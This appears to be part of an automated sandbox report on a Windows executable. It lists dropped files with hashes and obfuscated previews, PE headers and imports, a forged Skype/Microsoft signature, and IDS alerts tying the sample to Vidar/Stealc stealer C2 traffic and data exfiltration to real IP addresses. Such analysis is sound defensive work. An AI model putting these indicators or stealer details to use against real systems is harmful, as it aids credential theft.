                                                                                                  File Type:ASCII text, with very long lines (1017), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13541
                                                                                                  Entropy (8bit):5.0230071746545315
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jGRNHwstM6FM1g2iLOvu5pCP8VJAP/VmjJnHgi:irwsnxi8pI8PAFmFAi
                                                                                                  MD5:9E17257439AB3DEFC0B3AAE737EAEE80
                                                                                                  SHA1:A9C14852315854726BB75A2702A11CAB4E7263A9
                                                                                                  SHA-256:4EF2DF5760049AD16B8860E7BEFBEDE0C650B2BF0D797612BA0502B6CA064235
                                                                                                  SHA-512:31B632F4537CC0E8EEAD424A7362F105EF4942A6286AE47C48CD44BB16C392F65637350841676962CAB336BCE54075CD6EC376564BE89C39450D159BD432CBC6
                                                                                                  Malicious:false
                                                                                                  Preview:Set Apartment=o..xaxxParking Were Seen Implications Behaviour ..ZYNmReasons Ti Korean Arkansas ..jCNightmare Offense Afternoon Artistic Exhibition Gp Sas ..tuIGenerally Unsigned Cottage Near Sixth Nightlife ..PeARocky Nutten Blame Year Fundamental Mate Sr ..iPGPOmissions Travis Ja Archive Enterprises Hundred Tiger Store Bodies ..ZPJUMpeg Receptor Require ..yThbGrenada Header Va ..sBRentcom Cg Drove Webmasters Threesome Calculation Intersection ..FFUProtocol Blue Controversy Possibly Pathology Numerous ..Set Controllers=T..VJFriendship ..hIUPeter Livesex Moving Cardiff Detroit ..cWsDive Dick Bruce Lately Wires ..MupEmployees Oxide Cached Bradley Quantity Spouse Inquiry ..FvShip Nintendo Bunch Urgent Fs Battle Mitchell Stockholm ..gLgCell Ser Scientific Concerts Bangladesh Salem Regards ..noAi Greenhouse ..Set Italian=w..ppdMorrison Institute Penny Yields Meter Obtaining Leaves Cliff Documented ..bEaWanting Tradition Around Distinguished ..QJFinances If Types Transferred Webster Nt Charl

                                                                                                  C:\Users\user\AppData\Local\Temp\Ruth.cmd (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                  File Type:ASCII text, with very long lines (1017), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13541
                                                                                                  Entropy (8bit):5.0230071746545315
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jGRNHwstM6FM1g2iLOvu5pCP8VJAP/VmjJnHgi:irwsnxi8pI8PAFmFAi
                                                                                                  MD5:9E17257439AB3DEFC0B3AAE737EAEE80
                                                                                                  SHA1:A9C14852315854726BB75A2702A11CAB4E7263A9
                                                                                                  SHA-256:4EF2DF5760049AD16B8860E7BEFBEDE0C650B2BF0D797612BA0502B6CA064235
                                                                                                  SHA-512:31B632F4537CC0E8EEAD424A7362F105EF4942A6286AE47C48CD44BB16C392F65637350841676962CAB336BCE54075CD6EC376564BE89C39450D159BD432CBC6
                                                                                                  Malicious:false
                                                                                                  Preview:Set Apartment=o..xaxxParking Were Seen Implications Behaviour ..ZYNmReasons Ti Korean Arkansas ..jCNightmare Offense Afternoon Artistic Exhibition Gp Sas ..tuIGenerally Unsigned Cottage Near Sixth Nightlife ..PeARocky Nutten Blame Year Fundamental Mate Sr ..iPGPOmissions Travis Ja Archive Enterprises Hundred Tiger Store Bodies ..ZPJUMpeg Receptor Require ..yThbGrenada Header Va ..sBRentcom Cg Drove Webmasters Threesome Calculation Intersection ..FFUProtocol Blue Controversy Possibly Pathology Numerous ..Set Controllers=T..VJFriendship ..hIUPeter Livesex Moving Cardiff Detroit ..cWsDive Dick Bruce Lately Wires ..MupEmployees Oxide Cached Bradley Quantity Spouse Inquiry ..FvShip Nintendo Bunch Urgent Fs Battle Mitchell Stockholm ..gLgCell Ser Scientific Concerts Bangladesh Salem Regards ..noAi Greenhouse ..Set Italian=w..ppdMorrison Institute Penny Yields Meter Obtaining Leaves Cliff Documented ..bEaWanting Tradition Around Distinguished ..QJFinances If Types Transferred Webster Nt Charl

                                                                                                  C:\Users\user\AppData\Local\Temp\Scout

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):61440
                                                                                                  Entropy (8bit):6.172007656973097
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:LgEtEq2fG8YWqbmJYT5yXDlY9/UL4sgTNU+ufxv5I:L9t68cCWlrss4M5I
                                                                                                  MD5:F0EA4942F09528F44E39ACAE9C2F06BC
                                                                                                  SHA1:259FB0A1FEA589A7FA1B290CEA91879046D08CE8
                                                                                                  SHA-256:2405E33214050C56649FD0FAB58B486F8CC98C1242EA94EBB1CEA897575DCAF5
                                                                                                  SHA-512:E0D0275C9CBA31164388A190CD2BF082DEDAAEC12EE8395C025352A6851E3553E51AC3EC97D246892778307B66B7CF1B7F86778FF369921D1C625274ADAB6152
                                                                                                  Malicious:false
                                                                                                  Preview:...L..TG.....L.........L.........L.........L.....f....L.......L...I.....L..WG... .L.......$.L.......(.L.......,.L.....f..0.L.....4.L...I...@.L..XG...D.L.......H.L.......L.L.......P.L.....f..T.L.....X.L...I...d.L..XG...h.L.......l.L.......p.L.......t.L.....f..x.L.....|.L.D.I.....L.<YG.....L.........L.........L.........L.....f....L.......L...I.....L..ZG.....L.........L.........L.........L.....f....L.......L...I.....L..[G.....L.........L.........L.........L.....f....L.......L.d.I.....L...A.....L.........L.........L.........L.....f....L.......L.h.J.....L.t.G.....L....... .L.......$.L.......(.L.....f..,.L.....0.L...J...<.L...G...@.L.......D.L.......H.L.......L.L.....f..P.L.....T.L...J...`.L.H.G...d.L.......h.L.......l.L.......p.L.....f..t.L.....x.L...J.....L...G.....L.........L.........L.........L.....f....L.......L.(.J.....L.s.G.....L.........L.........L.........L.....f....L.......L.L.J.....L...G.....L.........L.........L.........L.....f....L.......L...I.....L.%\G.....L.........L.........L

                                                                                                  C:\Users\user\AppData\Local\Temp\Stylus

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):37888
                                                                                                  Entropy (8bit):6.536743940945966
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:2GY3PV7p180HcjRChcjDhU/RWEOrsaQ8UEd39+rdQLnBb2xXLDNxFch4A0:63Ppp180HcdCKjlWF0nQi9+knILDTJ
                                                                                                  MD5:04FB7D0A81DF5BD49F816A03E761DE1A
                                                                                                  SHA1:6923B7A465C7AB49546B735827B9B1A210B74BA9
                                                                                                  SHA-256:FDD32FF1BF55CCCAD61460D636A0FDECF52650584D1A0B70A8D424A167B14F32
                                                                                                  SHA-512:CB95AD9EDC7CED4905C87A72B186D8AD3283FA18424E6A40F7A8D6C1040FAD21F3EA1FB276257B91AC8C00C6FEA8AD83CB8C5086B313FCD5F9D40F38C6B72F15
                                                                                                  Malicious:false
                                                                                                  Preview:e run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B.........................................................................................................................................................................................................................................................................................................d.M.....h9'D......Y.hC'D......Y..-...hH'D......Y...F..hM'D.....Y.Q.%...h

                                                                                                  C:\Users\user\AppData\Local\Temp\Turtle

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18432
                                                                                                  Entropy (8bit):4.336346044366836
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:7sIiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiKX1Od5T1A/nYYYYYYYYYYYYYYYYYYZ:NOTyuav84444W
                                                                                                  MD5:28150242131957A37E7234031DA8CCF4
                                                                                                  SHA1:78BAE72BF0E3076638633F7F7585D917D68D39FF
                                                                                                  SHA-256:9E790BC388FB495773FD201A994038ACE8DF4346D50EE2CDF36EE730ACF2279C
                                                                                                  SHA-512:CECE17E5863FD6696F9C8555E6594C22807078405F326A6A72CB7C29DB56890B0C9EA966AB87B88F07E67030467A03F20D6B431E8637A90211A019507D99C587
                                                                                                  Malicious:false
                                                                                                  Preview:.....................................................................................................r.r.r.r.r.r.r.r.r.r.r...:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.r.r.r.............................................................................................................................................................r.k.....................r.r.r.r.....0.0.0.0.0.2...0.0.0.0.0.0.0.0.0.4.4.4.4.4.4.4.4.4.4.0.0.0.0.0.r...............................................................................................................r.r.r.r.r.r.r.r.r.............................r.r.....................r.r.........0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0...0.0.0.0.0.0.6.6.6.0.1.2.1.0.0.......................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r................................. .!.!. . ."."...#.#. .!.r.r.r.r.r.r.r.r.r.r.=.=.=.=.=.=.r.r.=.=.=.=.=.=.r.r.=.=.=.=.=

                                                                                                  C:\Users\user\AppData\Local\Temp\Usd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40960
                                                                                                  Entropy (8bit):6.507086619437831
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:2OIXyTkAZ0JhMsQf8HgOBsTBJkWVBJV/wJFU3ZHZMwetEOA5p5yMiwsSX1UxoWSd:2OIXyTsJ0Oetj0EJ5MwPOOFU6WS2uoy/
                                                                                                  MD5:A3E3F4669FA720E540FB8F3FEEA3A54E
                                                                                                  SHA1:B0CD2BA80800EADD2FE244B945734D7CF38712E4
                                                                                                  SHA-256:A9A08DEBEC110CABEDB5521C338E68D427F9A1C201B853623FE8F4A3B94F417E
                                                                                                  SHA-512:F3BD14E4B870E2CE9550DE9C30A63925E5E93EC23CBE61DCD2EAA548A8A4A1D866B8A6ECC29E59A4562361A6841865BB69DD55ACF48211970218E8C5BD776F1A
                                                                                                  Malicious:false
                                                                                                  Preview:3.]...U........E.SVW.@...3.\$..0.......N..D$.P.T$..$2..Y..uA.u....,...F..........H..D9.8\9.t..@8.@......D9.8\9.t..@8.X.....8\$...f....t$.Sj.....I..u............0.I..........hL.L..L$..++..Q.L$..wt....t..t$.j.j.....I....M..j.j..H...........H..|9...D9.t..@8.@......|9...D9.t..@8...@...+...&..F......L$...n...Lj.P...H..........H..|9...D9.t..@8.@......|9...D9.t..@8...@...R+...&..F.......tzj.S....I...uQP..0.I.P...H....S......H..|9...D9.t..@8.@......|9...D9.t..@8...@....*...&..F.....S..`.I....u.....*...F......._^3.[..]...U..Q.E.SVW.@....E...0.......N..E.P.U..%0...u...Y...*....u2.&.3.B.V....H..D9.8\9.t..@8.P..|9...D9.t..@8.@...&.}..t..E..E...y.....L.j...X...&.3.@.F._^3.[....U......<S.].V.u.W....F..D$...*...#.3.D$.A.K.3.;.v..F..H........D$...tV.N..........tG.F..0.......F..x..t2.E..@..0.......N..D$.P.T$..%/...|$..Y..$....D$.......I.Pj.h........I..D$.......................=........F....L$.QP....I.....2....M......j...j.V.t$..K....|$$.\$(j.j.j.V.._...........(..j.Xj.j.P.t$..F..>.^..|

                                                                                                  C:\Users\user\AppData\Local\Temp\Within

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:GTA2 binary mission script (SCR), Residential area (ste)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):165888
                                                                                                  Entropy (8bit):7.999117209114117
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:3072:w/IVdo4g1Q+F60QkRj/fbNL17YQbxGzds+i2U/ciOUoCiboEmnzjx0KX:fVLg1Q/UTBKQbxXT2FivQ9uzjxX
                                                                                                  MD5:53BD3CA945CDBE9CA0470F75C619714F
                                                                                                  SHA1:B745FA55CDC1297BEACB482F4A4FBD622072FB5C
                                                                                                  SHA-256:D62A0EEEE81532CF6D2254ABDF5CDEB3C1030F60F3DBE893C6108B8E090A0934
                                                                                                  SHA-512:08E11BAE3557615D12F87A3BEE08630E039BEE53BE0089B6AB48108EC205A93E002A26611F88AA133DEFCEF12FBF59FF9C27C4E4DA4CDFC8EB05218D7FE4ADEA
                                                                                                  Malicious:false
                                                                                                  Preview:<..^)Rs..}n.B..~..a..|J.......;..8...5G..k..-.a..p.9I%}.p....4..V.4m....w2..........Q.....R.[.l..0U...[8.{i.s..e..c....@........9.._.fL.....$.6!..T...lW2.....F<....w..d...h....cv....J.M..h...k.9$.U.u&t.....-gD.{.....-O......}.\.g.r6.R.7..2.....Z..me..Lw...,...y ..{...b..;:..w....~=/}(t.{.h...!.._$+.9...........|...Ug..r.......m..9...*CSh.....s..i..q.....@xA.0V.B.....)....J.p....~."-.......<.B7.Jb.....X...p;...5..e...^*h.Z..z..%...aWf-..%N..<h.\..G....%W3{.6Q....k...k.^{.V.V.D...D...]..*.+...i..^..Hu...-%d*.....N....l..a^.3....G&.....T.g.....[........O.u.@5;.....<(.....m.[...\..~....<.N12..VE.2...b..a+...,%.#l...'.0WL.J.&.....P..5u.'...:.U.y.. X.i=.$.@....a....$.a.....!T.x..F..<...#..5..I....t....J..9..Ru..jg..8....[f'rZ..E..j.....;^|.Z..?...H..9b......d.............h......Iz....iS............}...D...m.=o..H~...b.~...../5..eUMC...?...>.{..UP...O|m(..M....$y.. ...MS..u.K..P&Y..."?..D..2,.{pp..E...t-8.x.P...^V4...Ws..t....}.].q.V./.

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.953452448362295
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:file.exe
                                                                                                  File size:867'038 bytes
                                                                                                  MD5:569720e2c07b1d34bac1366bf2b1c97a
                                                                                                  SHA1:d0c7109e04b413f735bf034ce2cb2f8ee9daa837
                                                                                                  SHA256:0df79273aea792b72c2218a616b36324e31aaf7da59271969a23a0c392f58451
                                                                                                  SHA512:fa83ba4e0b1fa1f746e0ff94cb8f6e4ed9c841c66cc661c6fd28d30919ae657425fe0bb77319cf328a457600e364147c6e9d9140548a068a18a7e2ca0a3a2436
                                                                                                  SSDEEP:24576:TPULtGy0ccUe2jZIneELXUCULPoQg8bXT:zIfcOj4Yv
                                                                                                  TLSH:B5052302C6B9E067F9D60D7056B5BA272F7679581E30804E0728D96F3D727C9E2AA331
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

                                                                                                  File Icon

                                                                                                  Icon Hash:6066ced2d0c4fc0c

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x403883
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:true
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                  Authenticode Signature

                                                                                                  Signature Valid:false
                                                                                                  Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                  Error Number:-2146869232
                                                                                                  Not Before, Not After
                                                                                                  • 24/04/2024 22:20:26 19/04/2025 22:20:26
                                                                                                  Subject Chain
                                                                                                  • CN=Skype Software Sarl, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                  Version:3
                                                                                                  Thumbprint MD5:EB1CAB20508C9A21DFB09B2075D0D0F8
                                                                                                  Thumbprint SHA-1:9AA38CA0F770AB0A44B553BCD390395BCEC61EB4
                                                                                                  Thumbprint SHA-256:4DCCE58A880975BFD0555B7BB6358D99792AD448E400A3F4E6704EF70D3EBE1B
                                                                                                  Serial:33000003DE6C778D9215F2E1960000000003DE

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  sub esp, 000002D4h
                                                                                                  push ebx
                                                                                                  push ebp
                                                                                                  push esi
                                                                                                  push edi
                                                                                                  push 00000020h
                                                                                                  xor ebp, ebp
                                                                                                  pop esi
                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                  mov dword ptr [esp+10h], 00409268h
                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                  call dword ptr [00408030h]
                                                                                                  push 00008001h
                                                                                                  call dword ptr [004080B4h]
                                                                                                  push ebp
                                                                                                  call dword ptr [004082C0h]
                                                                                                  push 00000008h
                                                                                                  mov dword ptr [00472EB8h], eax
                                                                                                  call 00007FE6C957192Bh
                                                                                                  push ebp
                                                                                                  push 000002B4h
                                                                                                  mov dword ptr [00472DD0h], eax
                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                  push eax
                                                                                                  push ebp
                                                                                                  push 00409264h
                                                                                                  call dword ptr [00408184h]
                                                                                                  push 0040924Ch
                                                                                                  push 0046ADC0h
                                                                                                  call 00007FE6C957160Dh
                                                                                                  call dword ptr [004080B0h]
                                                                                                  push eax
                                                                                                  mov edi, 004C30A0h
                                                                                                  push edi
                                                                                                  call 00007FE6C95715FBh
                                                                                                  push ebp
                                                                                                  call dword ptr [00408134h]
                                                                                                  cmp word ptr [004C30A0h], 0022h
                                                                                                  mov dword ptr [00472DD8h], eax
                                                                                                  mov eax, edi
                                                                                                  jne 00007FE6C956EEFAh
                                                                                                  push 00000022h
                                                                                                  pop esi
                                                                                                  mov eax, 004C30A2h
                                                                                                  push esi
                                                                                                  push eax
                                                                                                  call 00007FE6C95712D1h
                                                                                                  push eax
                                                                                                  call dword ptr [00408260h]
                                                                                                  mov esi, eax
                                                                                                  mov dword ptr [esp+1Ch], esi
                                                                                                  jmp 00007FE6C956EF83h
                                                                                                  push 00000020h
                                                                                                  pop ebx
                                                                                                  cmp ax, bx
                                                                                                  jne 00007FE6C956EEFAh
                                                                                                  add esi, 02h
                                                                                                  cmp word ptr [esi], bx

                                                                                                  Rich Headers

                                                                                                  Programming Language:
                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                  • [LNK] VS2010 SP1 build 40219

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x5990.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xd133e0x27a0.ndata
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0xf40000x59900x5a00eb8c56433b1fc26513aefe9330c568d1False0.5465277777777777data5.641013138007415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0xfa0000xf320x1000c95352ad28755beb67c38585c38266eeFalse0.483642578125data5.059997097918888IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0xf42200x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.354759967453214
                                                                                                  RT_ICON0xf68880x15d9PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0019667441444664
                                                                                                  RT_ICON0xf7e680x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.4382969034608379
                                                                                                  RT_ICON0xf8f900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5833333333333334
                                                                                                  RT_DIALOG0xf93f80x100dataEnglishUnited States0.5234375
                                                                                                  RT_DIALOG0xf94f80x11cdataEnglishUnited States0.6056338028169014
                                                                                                  RT_DIALOG0xf96180x60dataEnglishUnited States0.7291666666666666
                                                                                                  RT_GROUP_ICON0xf96780x3edataEnglishUnited States0.8064516129032258
                                                                                                  RT_MANIFEST0xf96b80x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                  Possible Origin

                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishUnited States

                                                                                                  Network Behavior

                                                                                                  Suricata IDS Alerts

                                                                                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                                  2024-07-26T19:58:18.595071+0200TCP2051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1443497155.75.212.60192.168.2.5
                                                                                                  2024-07-26T19:58:48.364414+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49733443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:17.933745+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49715443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:40.259772+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49728443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:28.934319+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49722443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:16.599098+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49714443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:25.836622+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49720443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:34.371651+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49725443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:47.016652+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49732443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:29.673364+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected443497225.75.212.60192.168.2.5
                                                                                                  2024-07-26T19:58:42.938290+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49730443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:41.583181+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49729443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:39.089459+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49727443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:49.953417+0200TCP2054495ET MALWARE Vidar Stealer Form Exfil4973480192.168.2.577.91.101.71
                                                                                                  2024-07-26T19:58:27.179495+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49721443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:30.758808+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49723443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:23.676169+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49718443192.168.2.55.75.212.60
                                                                                                  2024-07-26T19:58:15.923488+0200TCP2049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST49711443192.168.2.55.75.212.60
